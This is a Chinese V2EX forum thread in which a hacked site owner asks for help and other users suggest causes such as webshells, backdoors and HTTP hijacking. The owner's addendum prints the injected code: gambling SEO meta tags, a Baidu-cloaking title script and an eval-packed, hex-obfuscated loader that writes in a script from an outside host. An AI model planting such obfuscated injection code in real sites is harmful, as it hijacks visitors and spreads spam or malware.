V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
doufenger
V2EX  ›  Linux

求助,服务器被黑了,首页一直被修改加上一个转到某个博彩网址的 js,我把文件调成只读都没用,有思路是什么原因吗?

  •  
  •   doufenger · 2018-08-17 17:04:19 +08:00 · 8755 次点击
    这是一个创建于 2324 天前的主题,其中的信息可能已经有所发展或是发生改变。
    第 1 条附言  ·  2018-08-18 16:46:22 +08:00
    感谢各位大佬,提供了很多个思路,我慢慢排查看先吧。 目前先换了服务器,可能存在问题的 PHP 就不放上去了。
    第 2 条附言  ·  2018-08-18 16:53:13 +08:00
    我服务器是 linux 的
    第 3 条附言  ·  2018-08-19 11:24:32 +08:00
    我换了服务器隐藏好 IP 了还是别挂了。被挂马的静态页被加了这样的代码

    <meta name="keywords" content="&#28595;&#38376;&#23041;&#23612;&#26031;&#22312;&#32447;&#24179;&#21488;&#44;&#23041;&#23612;&#26031;&#32593;&#19978;&#23089;&#20048;&#24179;&#21488;&#44;&#23041;&#23612;&#26031;&#24179;&#21488;&#23448;&#32593;&#44;&#23041;&#23612;&#26031;&#28216;&#25103;&#24179;&#21488;&#44;&#23041;&#23612;&#26031; "/>
    <meta name="description" content="&#12304;&#119;&#110;&#115;&#114;&#52;&#56;&#52;&#46;&#99;&#111;&#109;&#12305;&#23041;&#23612;&#26031;&#20154;&#23448;&#26041;&#32593;&#21487;&#20197;&#35753;&#22269;&#20869;&#30340;&#24456;&#22810;&#28216;&#25103;&#29609;&#23478;&#37117;&#24320;&#22987;&#21916;&#22909;&#19978;&#36825;&#31181;&#23089;&#20048;&#28216;&#25103;&#20307;&#39564;&#26041;&#24335;&#12290;&#36825;&#26159;&#20154;&#20204;&#25317;&#26377;&#23436;&#32654;&#19994;&#20313;&#29983;&#27963;&#30340;&#26377;&#25928;&#36884;&#24452;&#12290;&#36825;&#23545;&#25913;&#21892;&#29983;&#27963;&#36136;&#37327;&#30340;&#20316;&#29992;&#38750;&#24120;&#30340;&#37325;&#35201;&#12290;"/>
    <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
    <script type="text/javascript">
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
    40 条回复    2018-08-19 11:32:53 +08:00
    sabermiao
        1
    sabermiao  
       2018-08-17 17:08:03 +08:00
    location.href?
    XSS?
    doufenger
        2
    doufenger  
    OP
       2018-08-17 17:15:27 +08:00
    @sabermiao 他加的跳转代码删了就行了,关键是我改了服务器密码 FTP 密码什么的 文件调成只读了 都没有作用,他还是会改回来。
    Devilker
        3
    Devilker  
       2018-08-17 17:16:39 +08:00
    目测 数据库被加入代码了
    只要一更新网站就会再次加上
    helionzzz
        4
    helionzzz  
       2018-08-17 17:18:22 +08:00
    先彻查服务器里的 php 文件 之后再改代码什么的
    zarte
        5
    zarte  
       2018-08-17 17:34:52 +08:00
    管理员权限被人拿了你调权限有啥用。。
    keramist
        6
    keramist  
       2018-08-17 17:39:04 +08:00 via Android
    需要运维 wx: antcars 可长期 可一次性
    webjin1
        7
    webjin1  
       2018-08-17 18:01:21 +08:00
    前面套一个 WAF
    zjp
        8
    zjp  
       2018-08-17 18:22:33 +08:00 via Android
    root: 啥只读
    按惯例不应该是重装系统吗
    caola
        9
    caola  
       2018-08-17 18:30:46 +08:00
    自己的网站被黑还检查不出什么问题?。。。
    zhenghao110
        10
    zhenghao110  
       2018-08-17 19:04:45 +08:00 via Android
    @zjp 😂
    yongxa
        11
    yongxa  
       2018-08-17 19:20:34 +08:00 via Android
    cron ?
    sorcerer
        12
    sorcerer  
       2018-08-17 19:26:27 +08:00 via Android
    网站被放后门了吧
    gamexg
        13
    gamexg  
       2018-08-17 19:33:09 +08:00
    心太大了吧?
    被黑第一步排查原因,第二部重做系统。
    加只读是什么操作?
    tulongtou
        14
    tulongtou  
       2018-08-17 19:38:42 +08:00 via iPhone
    @helionzzz 为啥网站就一定有 php 文件
    beastk
        15
    beastk  
       2018-08-17 20:18:57 +08:00 via iPhone
    查日志看下怎么进来的,打补丁,做安全措施。
    luboyan
        16
    luboyan  
       2018-08-17 20:29:22 +08:00
    我也遇到之前两个月,我遇到的是 PHP 的一个文件有后门。wordpress 下载第三方模版时候带来的
    ccc008
        17
    ccc008  
       2018-08-17 20:32:05 +08:00
    我们公司也遇到过。清理所有 php 后门后还有。后来排查发现远程密码泄露了。233
    haimall
        18
    haimall  
       2018-08-17 20:32:49 +08:00 via Android
    先学习什么是后门,现在一般留 2-3 个后门的。 仔细检查下吧
    godgrp
        19
    godgrp  
       2018-08-17 20:41:32 +08:00 via Android
    有可能 dns 劫持,上 https
    mdos
        20
    mdos  
       2018-08-17 20:47:20 +08:00
    文件先备份,然后重装服务器,密码都改掉,然后排查文件。等文件确认无后门后在传回服务器。
    yanaraika
        21
    yanaraika  
       2018-08-17 20:51:38 +08:00
    一定要备份已有代码、格盘、手动检查所有代码、重装服务器
    houyujiangjun
        22
    houyujiangjun  
       2018-08-17 21:42:46 +08:00
    明显是 cdn 劫持,上证书吧 骚年
    iMusic
        23
    iMusic  
       2018-08-17 21:43:48 +08:00
    像电信搞的鬼
    mytsing520
        24
    mytsing520  
       2018-08-17 21:52:28 +08:00
    1.检查 rewrite ;
    2.检查代码;
    3.检查数据库
    ztaosony
        25
    ztaosony  
       2018-08-17 22:24:47 +08:00
    先检查有没有后门,然后把所有的密码都改一遍
    1nclude
        26
    1nclude  
       2018-08-17 22:30:18 +08:00
    先查杀下 webshell,然后查看下日志,看看是怎么进来的
    toarufan
        27
    toarufan  
       2018-08-17 22:59:13 +08:00
    难道不是 http 劫持了,上 https 吧
    Akkuman
        28
    Akkuman  
       2018-08-17 23:22:37 +08:00 via Android
    看起来像是 http 劫持,之前碰到过这种情况,上 https
    feifei8868
        29
    feifei8868  
       2018-08-17 23:35:01 +08:00   ❤️ 1
    换个网络环境看一下,例如 电信有换联通或移动 看一下 如果只有一家服务商或一家的一个地区基本就确定是劫持,如果确定是了 就上 HTTPS 了 如果不是劫持,就"找人"检查程序服务器了
    LvMax
        30
    LvMax  
       2018-08-18 00:00:54 +08:00 via iPhone
    D 盾扫服务器 找有没有 shell 其他的再说 基本上是被写 shell 了
    a516307724
        31
    a516307724  
       2018-08-18 10:49:45 +08:00
    看起来像是 网络劫持,换个网络环境看看吧
    ddzzhen
        32
    ddzzhen  
       2018-08-18 11:06:24 +08:00
    full ssl
    abccccabc
        33
    abccccabc  
       2018-08-18 14:19:11 +08:00
    楼主,查出来问题了没有?
    VgV
        34
    VgV  
       2018-08-18 15:27:15 +08:00
    瑟瑟发抖,加个只读这个操作真是可怕。。
    ps:楼上说的 http 劫持,能跳到菠菜?那有关部门第一时间就上门查运营商水表。
    hu5ky
        35
    hu5ky  
       2018-08-18 15:36:40 +08:00
    什么原因可以自己查日志分析怎么入侵的啊,,你这个什么逻辑????
    uptime
        36
    uptime  
       2018-08-18 15:56:01 +08:00
    格盘重装也有说的……
    ihavecat
        37
    ihavecat  
       2018-08-18 16:59:34 +08:00
    @VgV 确实,如果是运营商这种操作肯定会被举报的
    laolinn
        38
    laolinn  
       2018-08-18 22:42:48 +08:00 via iPhone
    首先确认一下 PHP 环境是不是用了那些什么一键搭配来弄的,是的话赶紧换掉。看看日志文件有什么可疑地方,最后就是找时间把网站的漏洞修复一下
    llllllLllll
        39
    llllllLllll  
       2018-08-19 08:54:03 +08:00
    看一下有没有异常进程
    doufenger
        40
    doufenger  
    OP
       2018-08-19 11:32:53 +08:00
    我把被串改的代码贴到补充了 哪位大神看看
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2875 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 08:29 · PVG 16:29 · LAX 00:29 · JFK 03:29
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.